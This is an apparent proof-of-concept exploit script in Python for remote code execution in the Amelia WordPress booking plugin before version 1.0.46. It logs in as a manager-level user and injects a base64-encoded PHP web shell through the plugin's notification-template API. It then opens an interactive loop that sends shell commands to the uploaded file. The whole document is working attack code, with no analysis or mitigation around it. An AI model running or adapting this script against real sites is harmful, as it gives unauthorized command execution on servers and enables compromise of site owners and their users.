Amelia < 1.0.46 - Manager+ RCE

import requests
import base64

BASE_URL = "http://localhost:8000"
id = "wordpress"
pw = "wordpress"

def login(id, pw) :
    sess = requests.Session()
    sess.post(
        BASE_URL + "/wp-login.php",
        data = {
            'log': id,
            'pwd': pw,
            'wp-submit': '%EB%A1%9C%EA%B7%B8%EC%9D%B8',
            'testcookie': '1'
        }
    ).text
    
    return sess

def exploit(sess) : 
    SHELLCODE = b"<?php echo(passthru($_POST['qerogram']));?>"

    payload = r'''{"id":1,"name":"customer_appointment_approved","customName":null,"status":"enabled","type":"email","entity":"appointment","time":null,"timeBefore":null,"timeAfter":null,"sendTo":"customer","subject":"%service_name% Appointment Approved",'''
    payload += r'''"content":"<p>Dear <strong><img src=\"data:image/php;,''' + base64.b64encode(SHELLCODE).decode() 
    payload += r'''\">%customer_full_name%</strong>,</p><p><br></p><p>You have successfully scheduled <strong>%service_name%</strong> appointment with <strong>%employee_full_name%</strong>. We are waiting you at <strong>%location_address% </strong>on <strong>%appointment_date_time%</strong>.</p><p><br></p><p>Thank you for choosing our company,</p><p><strong>%company_name%</strong></p>","translations":null,"entityIds":null,"sendOnlyMe":null}'''

    res = sess.post(
        f"{BASE_URL}/wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/1",
        data = payload,
        headers = {"Content-Type": "application/json;charset=UTF-8"}
    )

    SHELL_ADDR = res.json()['data']['notification']['content']
    SHELL_ADDR = SHELL_ADDR[SHELL_ADDR.find('src="')+5:]
    SHELL_ADDR = SHELL_ADDR[:SHELL_ADDR.find('"')]
    
    while True :
        cmd = input("$ ")
        if cmd.lower() == "exit" or cmd.lower() == "quit"  : 
            break

        res = sess.post(
            SHELL_ADDR,
            data = {"qerogram" : cmd}
        )
        print(res.text)


sess = login(id,pw)
exploit(sess)